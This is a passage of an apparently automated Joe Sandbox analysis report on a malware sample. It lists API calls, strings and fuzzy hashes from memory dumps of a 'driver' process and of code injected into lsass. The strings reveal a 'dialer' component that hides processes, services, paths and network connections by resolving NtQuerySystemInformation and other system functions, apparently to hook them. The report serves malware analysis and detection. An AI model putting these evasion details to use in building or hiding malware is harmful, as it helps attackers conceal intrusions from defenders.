                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction ID: e9cb6ede685aab8f89b168d04e934e1b4a980d6fc3f072786e7583b2f47d31d4
                                                                                • Opcode Fuzzy Hash: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction Fuzzy Hash: FE419365E0854683EB10AF47D5846B9A7E0EB44BE4FD84531CE2D833E1DE3CE646C3A4

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction ID: f1d275591d7f2a7b31807b4cfb00d899e5c4fcc15df66cb4f7705ed59837bbc8
                                                                                • Opcode Fuzzy Hash: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction Fuzzy Hash: D021F121E4950683F715BF06E98027492A0BF51BA4FC90930C93D976E8DF2DBA4283A0

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction ID: b190482f421f4aaec18e6122bc61f113ae1c4e6e825df93530988ca6efa07d0b
                                                                                • Opcode Fuzzy Hash: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction Fuzzy Hash: D0217121E0950643FB757A17DAC037991C1AF847B4FAC8631DE3D872D4DE2CAA8182E8

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F4F21247), ref: 00007FF7F4F219F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction ID: b5792ebfb7cfdd9c14ff38ac9962e7a1277aceab65d1ba1bf067b3e9f27e124a
                                                                                • Opcode Fuzzy Hash: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction Fuzzy Hash: F1517321F04556D7EB10AF26D9807B5B7A1BB04BA4F884531D92C477E8CF3CE686C764

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction ID: aa942754d01d90b211afdf6a59a1d4fbc5bcf97fba87f33a1224a04b7ba292aa
                                                                                • Opcode Fuzzy Hash: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction Fuzzy Hash: 73F0C811E1898583E711BF26E9810BDE3A1EB493E0F949231DE5DA32D1DF1CE2418350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction ID: ca75ff9f811bda27e18eaa4e67340965efadba597e2f66f84bd636409870b8d5
                                                                                • Opcode Fuzzy Hash: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction Fuzzy Hash: 8B011E25E0960683F715BF56ED8027492A0BF04FA0FC90431CE2D536D4DF2CBA9282A0

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:131
                                                                                Total number of Limit Nodes:10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: S$dialer
                                                                                • API String ID: 756756679-3873981283
                                                                                • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                                • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                                  • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                                • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                                • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                                • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                                  • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                                  • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                                  • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
